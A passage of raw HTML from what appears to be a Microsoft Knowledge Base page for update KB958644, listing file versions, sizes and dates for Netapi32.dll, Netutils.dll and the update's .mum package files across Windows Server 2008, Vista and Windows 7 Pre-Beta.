class=\"sbody-td\">04:38</td><td class=\"sbody-td\">x86</td></tr></table></div><br/><span class=\"text-base\">For all supported IA-64-based versions of Windows Server 2008</span><br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Netapi32.dll</td><td class=\"sbody-td\">6.0.6001.18157</td><td class=\"sbody-td\">1,080,832</td><td class=\"sbody-td\">16-Oct-2008</td><td class=\"sbody-td\">06:21</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Netapi32.dll</td><td class=\"sbody-td\">6.0.6001.22288</td><td class=\"sbody-td\">1,080,832</td><td class=\"sbody-td\">16-Oct-2008</td><td class=\"sbody-td\">04:59</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Netapi32.dll</td><td class=\"sbody-td\">6.0.6001.18157</td><td class=\"sbody-td\">466,944</td><td class=\"sbody-td\">16-Oct-2008</td><td class=\"sbody-td\">04:47</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Netapi32.dll</td><td class=\"sbody-td\">6.0.6001.22288</td><td class=\"sbody-td\">466,944</td><td class=\"sbody-td\">16-Oct-2008</td><td class=\"sbody-td\">04:38</td><td class=\"sbody-td\">x86</td></tr></table></div><br/><span class=\"text-base\">Windows 7 Pre-Beta file information notes</span><br/><br/> The MANIFEST files (.manifest) and the MUM files (.mum) that are installed for each environment are <a bookmark-id=\"2manifests\" href=\"#2manifests\" managed-link=\"\" target=\"\">listed separately</a>. MUM and MANIFEST files, and the associated security catalog (.cat) files, are critical to maintaining the state of the updated component. The security catalog files (attributes not listed) are signed with a Microsoft digital signature. <br/><br/><br/><span class=\"text-base\">For all supported x86-based versions of Windows 7 Pre-Beta</span><br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Netutils.dll</td><td class=\"sbody-td\">6.1.6801.4107</td><td class=\"sbody-td\">22,528</td><td class=\"sbody-td\">20-Oct-2008</td><td class=\"sbody-td\">23:19</td><td class=\"sbody-td\">x86</td></tr></table></div><br/><span class=\"text-base\">For all supported x64-based versions of Windows 7 Pre-Beta</span><br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Netutils.dll</td><td class=\"sbody-td\">6.1.6801.4107</td><td class=\"sbody-td\">29,184</td><td class=\"sbody-td\">20-Oct-2008</td><td class=\"sbody-td\">23:47</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Netutils.dll</td><td class=\"sbody-td\">6.1.6801.4107</td><td class=\"sbody-td\">22,528</td><td class=\"sbody-td\">20-Oct-2008</td><td class=\"sbody-td\">23:19</td><td class=\"sbody-td\">x86</td></tr></table></div><br/><span class=\"text-base\">For all supported ia64-based versions of Windows 7 Pre-Beta</span><br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Netutils.dll</td><td class=\"sbody-td\">6.1.6801.4107</td><td class=\"sbody-td\">59,904</td><td class=\"sbody-td\">20-Oct-2008</td><td class=\"sbody-td\">23:08</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Netutils.dll</td><td class=\"sbody-td\">6.1.6801.4107</td><td class=\"sbody-td\">22,528</td><td class=\"sbody-td\">20-Oct-2008</td><td class=\"sbody-td\">23:19</td><td class=\"sbody-td\">x86</td></tr></table></div><br/><a class=\"bookmark\" id=\"manifests\"></a><span class=\"text-base\">Additional file information for Windows Server 2008, for Windows Vista, and for Windows 7 Pre-Beta</span><br/><br/><span class=\"text-base\">Additional files for all supported x86-based versions of Windows Server 2008, Windows Vista</span><br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_1_for_kb958644_bf~31bf3856ad364e35~x86~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,743</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_1_for_kb958644~31bf3856ad364e35~x86~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,445</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_2_for_kb958644_bf~31bf3856ad364e35~x86~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,906</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_2_for_kb958644~31bf3856ad364e35~x86~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,612</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_3_for_kb958644_bf~31bf3856ad364e35~x86~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,748</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_3_for_kb958644~31bf3856ad364e35~x86~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,450</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_4_for_kb958644_bf~31bf3856ad364e35~x86~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,748</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_4_for_kb958644~31bf3856ad364e35~x86~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,452</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_5_for_kb958644_bf~31bf3856ad364e35~x86~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,748</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_5_for_kb958644~31bf3856ad364e35~x86~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,452</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_6_for_kb958644_bf~31bf3856ad364e35~x86~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,744</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_6_for_kb958644~31bf3856ad364e35~x86~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,447</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_client_0_bf~31bf3856ad364e35~x86~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,416</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_client_0~31bf3856ad364e35~x86~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,435</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_client_1_bf~31bf3856ad364e35~x86~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,357</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_client_1~31bf3856ad364e35~x86~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,376</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_client_bf~31bf3856ad364e35~x86~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,691</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_client~31bf3856ad364e35~x86~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,722</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_sc_0_bf~31bf3856ad364e35~x86~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,411</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_sc_0~31bf3856ad364e35~x86~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,431</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_sc_bf~31bf3856ad364e35~x86~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,413</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_sc~31bf3856ad364e35~x86~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,432</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_server_0_bf~31bf3856ad364e35~x86~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,415</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_server_0~31bf3856ad364e35~x86~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,434</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_server_bf~31bf3856ad364e35~x86~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,421</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_server~31bf3856ad364e35~x86~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,440</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td 